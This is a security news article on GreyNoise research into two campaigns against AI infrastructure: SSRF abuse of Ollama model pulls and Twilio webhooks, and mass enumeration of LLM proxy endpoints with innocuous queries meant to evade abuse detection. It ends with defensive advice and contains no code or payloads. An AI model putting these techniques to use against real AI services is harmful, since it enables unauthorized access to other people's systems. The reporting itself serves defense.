editorially independent. We may make money when you click on links
to our partners.
Learn More
Attackers have moved beyond experimentation and are now systematically targeting artificial intelligence systems at scale.
Researchers observed more than 91,000 attack sessions aimed at AI infrastructure over a four-month period, revealing sustained and methodical campaigns against large language model (LLM) deployments.
“Threat actors don’t map infrastructure at this scale without plans to use that map,” said GreyNoise researchers.
Attackers Recon AI Services at Scale
The observed activity targeted AI model hosting environments and their supporting services, including Ollama deployments and proxy infrastructure used to connect applications to commercial large language model (LLM) APIs.
As organizations increasingly deploy AI systems in production, these services are often exposed through APIs, webhooks, or proxy layers, creating new opportunities for attackers to probe for misconfigurations and abuse.
SSRF-Based Exploitation Campaign
The first campaign focused on server-side request forgery (SSRF) techniques.
Attackers abused Ollama’s model pull feature and Twilio webhook parameters to trigger outbound connections to attacker-controlled infrastructure.
Attackers confirmed successful exploitation using ProjectDiscovery’s OAST callbacks to detect outbound requests from target systems.
This activity persisted from October 2025 through January 2026, with a notable spike during the Christmas period — 1,688 attack sessions within 48 hours.
The timing suggests an effort to take advantage of periods when monitoring and response coverage may be reduced.
Traffic analysis also showed a highly consistent JA4H TLS fingerprint appearing in 99% of sessions, pointing to centralized automation, likely built on the Nuclei scanning framework.
Although requests originated from 62 IP addresses across 27 countries, the uniform fingerprints indicate the use of VPS-hosted infrastructure rather than a distributed botnet.
GreyNoise assessed this campaign as potentially grey-hat activity associated with bug bounty research, but noted that the scale, persistence, and lack of coordination with affected organizations raise ethical and operational concerns.
Large-Scale AI Model Enumeration
A second, larger campaign began on Dec. 28, 2025, and emphasized systematic enumeration rather than immediate exploitation.
Over an eleven-day period, just two IP addresses generated 80,469 sessions, methodically probing more than 70 LLM endpoints.
The apparent objective was to identify misconfigured proxy servers that could allow unauthorized access to commercial AI services.
To avoid detection, attackers used deliberately low-risk queries such as hi and How many states are there in the United States? — phrases used to confirm model behavior without triggering abuse detection or content filters.
Testing spanned nearly every major model family, including OpenAI GPT-4o, Anthropic Claude, Meta Llama 3.x, Google Gemini, Mistral, Alibaba Qwen, DeepSeek-R1, and xAI Grok, highlighting a broad and methodical approach to mapping the AI ecosystem.
Together, these campaigns show a move toward systematic reconnaissance of AI infrastructure, reinforcing the need to secure AI services like traditional applications and APIs.
Reducing Risk in AI Deployments
Organizations running AI infrastructure should take proactive steps to reduce exposure to reconnaissance and exploitation activity, including the following.
- Restrict outbound network access so AI servers can connect only to explicitly approved destinations and prevent SSRF callback abuse.
- Block known malicious indicators, including OAST-related domains, identified IP addresses, and suspicious JA4H fingerprints.
- Enforce strong authentication, authorization, and least-privilege access controls across AI endpoints, proxies, and supporting services.
- Apply rate limiting, request quotas, and behavioral throttling to disrupt automated enumeration and fingerprinting activity.
- Monitor AI infrastructure logs and telemetry for anomalous query patterns, cross-model probing, and suspicious outbound connections.
- Review and test incident response plans and detection coverage to ensure readiness for AI-specific exploitation and reconnaissance campaigns.
While no single control is sufficient on its own, a combination of network restrictions, access controls, and monitoring can limit the blast radius.
AI Systems Are Now High-Value Targets
These campaigns reflect a broader shift in attacker focus, with AI infrastructure increasingly treated as a high-value target rather than an experimental technology.
The volume and consistency of the activity — tens of thousands of requests spanning dozens of models — suggest deliberate and well-resourced efforts rather than opportunistic scanning.
Mapping AI environments at this level requires time and coordination, and it is typically a precursor to identifying weaknesses that can be exploited later.
With AI services increasingly embedded in production workflows, they are attracting the same level of attention historically reserved for critical application and cloud infrastructure.
As a result, many organizations are looking to zero-trust approaches to reduce implicit access and limit the impact of compromise across AI environments.
